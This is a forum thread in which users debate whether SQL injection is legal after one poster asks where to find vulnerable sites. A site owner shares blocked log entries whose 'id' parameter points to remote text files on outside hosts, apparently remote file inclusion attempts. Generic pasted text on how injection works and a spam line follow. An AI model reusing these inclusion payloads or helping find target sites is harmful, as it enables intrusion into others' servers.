Anybody here know how to do SQL injection. I know how to do it its just hard to find a good vulnerable site.

Why would you want to inject someone else's website? It's illegal, and ignorant if you ask me.

Not neccesarily illegal. It is used in many legal ways.

No. SQL injection is gaining access to someones database without their permission. Vulnerabilities are something that isn't supposed to be there, which means you are exploiting their website without their consent. How is that not illegal?

Its illegal if you do something with it. Like deleting a table or the whole database or creating a table. Know what I meen?

No, it's illegal to gain access to something that isn't yours in general.

Look at it this way. The lock on your door isn't that great, and someone enters your house. They might touch some things, but they don't break them. Do you consider that legal?

(Whatever I give up lol.

My site (not my current site, the tests site that I made), got hacked secretly, the hacker didn't attempt to change my password or anything. It was kinda strange that he found an exploit. I bet he did that to other sites.

All he did was creating a thread and put it to hidden said that "blahblahblahblahblahblah".

Care to explain how this was accomplished? I'm hoping this CMS I'm making for my class I'm taking isn't vulnerable.

I checked the log today, very weird over here:
-----------------------------
* 2008-12-21 15:14 **.**.**.*** Security A variable type check failed, expecting 1/INT for 'id' : 81//page.php?id=http://inamsan.kg.kr/emt/id.txt??? - /page.php?id=81//page.php?id=http://inamsan.kg.kr/emt/id.txt???

* 2008-12-21 15:14 **.**.**.*** Security A variable type check failed, expecting 1/INT for 'id' : http://inamsan.kg.kr/emt/id.txt??? - //page.php?id=http://inamsan.kg.kr/emt/id.txt???

* 2008-12-21 15:05 ***.***.***.*** Security A variable type check failed, expecting 1/INT for 'id' : 81" class="searchlinktitle" title="www.igfxdesigns.co.uk/page.php?id=81" onMouseOver="window.status='www.igfxdesigns.co.uk//page.php?id=http://www.acewaste.com.au/content/robo.txt??? - /page.php?id=

* 2008-12-21 15:05 ***.***.***.*** Security A variable type check failed, expecting 1/INT for 'id' : http://www.acewaste.com.au/content/robo.txt??? - //page.php?id=http://www.acewaste.com.au/content/robo.txt???
-----------------------------
Seems like he tried to get userid1's password.

Those are standard hack attempts. I get them all the time. I think everyone does. Good thing they're blocked by Seditio, eh?

SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.

The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

The injection process works by prematurely terminating a text string and appending a new command. Because the inserted command may have additional strings appended to it before it is executed, the malefactor terminates the injected string with a comment mark "--". Subsequent text is ignored at execution time.


Thanks

toronto condos for sale